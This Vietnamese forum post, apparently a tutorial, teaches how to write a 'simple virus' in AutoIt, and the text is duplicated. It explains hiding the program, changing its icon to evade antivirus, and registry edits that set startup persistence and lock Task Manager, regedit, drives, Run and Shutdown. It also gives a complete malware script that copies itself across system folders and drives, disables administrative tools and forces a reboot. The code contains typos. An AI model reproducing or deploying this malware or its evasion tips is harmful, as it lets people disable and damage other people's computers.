Search
Latest topics
viết một chương trình virus đơn giản
Page 1 of 1
viết một chương trình virus đơn giản
Để viết một chương trình virus đơn giản,đầu tiên các bạn phải down chương trình về tại đây
AutoIt Script Home Page
Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe
*Chú ý: +Khi edit 1 một con virus bắt buộc phải nhấn phải chuột rồi nhấn edit script, chứ nếu nhấn chuột trái như bình thường là bạn sẽ tự dính con virus mà bạn làm ra đó
+Không nên kiếm ebook autoit vì nó kô hữu dụng cho bạn đâu, nếu muốn học sâu và rộng hơn thì bạn bắt buộc phải đọc trong file help của chương trình
+Icon của chương trình bắt buộc kô được đẽ mặc định vì các trình virus sẽ phát hiện
+Các lệnh mình sẽ làm nổi lên
Nhưng gì mình viết lên đây chỉ mang tính chất tham khảo.Yêu cầu các bạn không dùng những gì mình viết lên đây để phá người khác
Bắt đầu:
Bước 1: Coppy các code từ hoalong77
Bước 2: Tạo 1 file .au3
Bước 3:Edit scirpt
Bước 4 Paste code vào
Bước 5:Convert file au3 --> exe (cái này quan trọng)
Nếu đây là lần đâu tiên bạn convert file au3 --> exe thì phải làm theo các bước đó, nhưng về sau bạn chỉ cần nhấn phải chột vào file au3 và nhấn compile script là file exe sẽ compile ngay tại thư mục chứa file au3 ^^
Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có:
#Notrayicon
---> để kô hiện chương trình ở taskbar,có nghĩa là nó sẽ chạy ẩn trong Windown
FileCopy(@ScriptDir & "\***.exe","C:\WINDOWS",1)
---> "***" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp.Lưu ý:Tên virus này bạn sẽ tạo ra lúc biên dich chương trình thành file .exe
Lệnh khắc phục:
FileDelete("C:\Windows\*****.exe")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\*****.exe")
---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
----> lệnh này sẽ giúp làm mất nút run trong windows
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun")
RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete","RED_DWORD","1")
----->Lệnh này sẽ làm vô hiệu hoá thùng rác
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
---> lệnh này làm mất nút Shutdown ở Start
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose")
Lệnh reset máy: Các ban cần lưu ý với các lệnh reset máy vì nó sẽ reset máy của ban liện tục mỗi khi bạn vào Windown
Shutdown(thông số)
Các thông số có thể có là
+0: Đổi user (hay thường gọi là log off)
+1: Tắt máy (shutdown)
+2: reset máy(restart)
+4: Force
+8: Power down
+32: Stanby
+64: Hibernate
VD: Shutdown(2) ---> reset máy
Lệnh đợi, dừng:
Sleep(seconds)
VD: Sleep(3000) ---> Dừng 3 giây
Lệnh kô cho mỡ 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó)
$VA = ProcessExists("iexplore.exe")
$RA = ProcessClose("iexplore.exe")
$BU = ProcessExists("winamp.exe")
$BA = ProcessClose("winamp.exe")
While 1
if $VA then $RA
$RA = ProcessClose("iexplore.exe")
if $BU then $BA
$BA = ProcessClose("winamp.exe")
WEnd
----> VD: If ProcessExists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
ProcessClose("iexplorer.exe") --> đóng ngay lập tức
EndIf
Còn đây la một con virus nhỏ mà mình đã tự viết:
#cs ----------------------------------------------------------------------------
Author: hoalong77
Script Function:
Template AutoIt script.
#ce ----------------------------------------------------------------------------
; Script Start - Add your code below here
#Notrayicon
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1)
FileCopy(@ScriptDir & "\Setup.exe","D:\",1)
FileCopy(@ScriptDir & "\Setup.exe","E:\",1)
FileCopy(@ScriptDir & "\Setup.exe","F:\",1)
FileCopy(@ScriptDir & "\Setup.exe","G:\",1)
FileCopy(@ScriptDir & "\Setup.exe","H:\",1)
FileCopy(@ScriptDir & "\Setup.exe","J:\",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
While 1
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1)
FileCopy(@ScriptDir & "\Setup.exe","D:\",1)
FileCopy(@ScriptDir & "\Setup.exe","E:\",1)
FileCopy(@ScriptDir & "\Setup.exe","F:\",1)
FileCopy(@ScriptDir & "\Setup.exe","G:\",1)
FileCopy(@ScriptDir & "\Setup.exe","H:\",1)
FileCopy(@ScriptDir & "\Setup.exe","J:\",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
WEnd
Sleep(1000)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoControlPanel","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite(" HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoDesktop","RED_DWORD","1")
RegWrite("[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","Notraycontextmenu","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoFind","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ BitBucket","NukeOnDelete","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","REG_SZ ","0")
RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","RED_DWORD ","1")
RegWrite("HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
Slepp(1000)
Shutdown(2)
AutoIt Script Home Page
Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe
*Chú ý: +Khi edit 1 một con virus bắt buộc phải nhấn phải chuột rồi nhấn edit script, chứ nếu nhấn chuột trái như bình thường là bạn sẽ tự dính con virus mà bạn làm ra đó
+Không nên kiếm ebook autoit vì nó kô hữu dụng cho bạn đâu, nếu muốn học sâu và rộng hơn thì bạn bắt buộc phải đọc trong file help của chương trình
+Icon của chương trình bắt buộc kô được đẽ mặc định vì các trình virus sẽ phát hiện
+Các lệnh mình sẽ làm nổi lên
Nhưng gì mình viết lên đây chỉ mang tính chất tham khảo.Yêu cầu các bạn không dùng những gì mình viết lên đây để phá người khác
Bắt đầu:
Bước 1: Coppy các code từ hoalong77
Bước 2: Tạo 1 file .au3
Bước 3:Edit scirpt
Bước 4 Paste code vào
Bước 5:Convert file au3 --> exe (cái này quan trọng)
Nếu đây là lần đâu tiên bạn convert file au3 --> exe thì phải làm theo các bước đó, nhưng về sau bạn chỉ cần nhấn phải chột vào file au3 và nhấn compile script là file exe sẽ compile ngay tại thư mục chứa file au3 ^^
Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có:
#Notrayicon
---> để kô hiện chương trình ở taskbar,có nghĩa là nó sẽ chạy ẩn trong Windown
FileCopy(@ScriptDir & "\***.exe","C:\WINDOWS",1)
---> "***" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp.Lưu ý:Tên virus này bạn sẽ tạo ra lúc biên dich chương trình thành file .exe
Lệnh khắc phục:
FileDelete("C:\Windows\*****.exe")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\*****.exe")
---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
----> lệnh này sẽ giúp làm mất nút run trong windows
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun")
RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete","RED_DWORD","1")
----->Lệnh này sẽ làm vô hiệu hoá thùng rác
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
---> lệnh này làm mất nút Shutdown ở Start
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose")
Lệnh reset máy: Các ban cần lưu ý với các lệnh reset máy vì nó sẽ reset máy của ban liện tục mỗi khi bạn vào Windown
Shutdown(thông số)
Các thông số có thể có là
+0: Đổi user (hay thường gọi là log off)
+1: Tắt máy (shutdown)
+2: reset máy(restart)
+4: Force
+8: Power down
+32: Stanby
+64: Hibernate
VD: Shutdown(2) ---> reset máy
Lệnh đợi, dừng:
Sleep(seconds)
VD: Sleep(3000) ---> Dừng 3 giây
Lệnh kô cho mỡ 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó)
$VA = ProcessExists("iexplore.exe")
$RA = ProcessClose("iexplore.exe")
$BU = ProcessExists("winamp.exe")
$BA = ProcessClose("winamp.exe")
While 1
if $VA then $RA
$RA = ProcessClose("iexplore.exe")
if $BU then $BA
$BA = ProcessClose("winamp.exe")
WEnd
----> VD: If ProcessExists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
ProcessClose("iexplorer.exe") --> đóng ngay lập tức
EndIf
Còn đây la một con virus nhỏ mà mình đã tự viết:
#cs ----------------------------------------------------------------------------
Author: hoalong77
Script Function:
Template AutoIt script.
#ce ----------------------------------------------------------------------------
; Script Start - Add your code below here
#Notrayicon
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1)
FileCopy(@ScriptDir & "\Setup.exe","D:\",1)
FileCopy(@ScriptDir & "\Setup.exe","E:\",1)
FileCopy(@ScriptDir & "\Setup.exe","F:\",1)
FileCopy(@ScriptDir & "\Setup.exe","G:\",1)
FileCopy(@ScriptDir & "\Setup.exe","H:\",1)
FileCopy(@ScriptDir & "\Setup.exe","J:\",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
While 1
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1)
FileCopy(@ScriptDir & "\Setup.exe","D:\",1)
FileCopy(@ScriptDir & "\Setup.exe","E:\",1)
FileCopy(@ScriptDir & "\Setup.exe","F:\",1)
FileCopy(@ScriptDir & "\Setup.exe","G:\",1)
FileCopy(@ScriptDir & "\Setup.exe","H:\",1)
FileCopy(@ScriptDir & "\Setup.exe","J:\",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
WEnd
Sleep(1000)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoControlPanel","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite(" HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoDesktop","RED_DWORD","1")
RegWrite("[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","Notraycontextmenu","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoFind","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ BitBucket","NukeOnDelete","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","REG_SZ ","0")
RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","RED_DWORD ","1")
RegWrite("HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
Slepp(1000)
Shutdown(2)
Similar topics
» Viết chương trình giải phương trình bậc 1 ax + b=0
» Viết chương trình đảo chuổi ký tự
» Làm chương trình bommail bằng VB
» Kết nối CSDL MySQL từ chương trình VC#
» Danh sách 114 chương trình diệt vi rút giả mạo
» Viết chương trình đảo chuổi ký tự
» Làm chương trình bommail bằng VB
» Kết nối CSDL MySQL từ chương trình VC#
» Danh sách 114 chương trình diệt vi rút giả mạo
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Thu Aug 23, 2012 5:38 am by Admin
» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin
» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin
» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin
» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin
» Giá của món quà
Fri Apr 13, 2012 6:01 am by Admin
» Sẽ chỉ yêu ai?
Fri Apr 13, 2012 6:01 am by Admin
» Cách đọc bảng chữ cái!
Thu Apr 12, 2012 10:37 pm by Admin
» Gắn trojan, keylog, virus vào website, forum
Tue Apr 10, 2012 1:14 am by Admin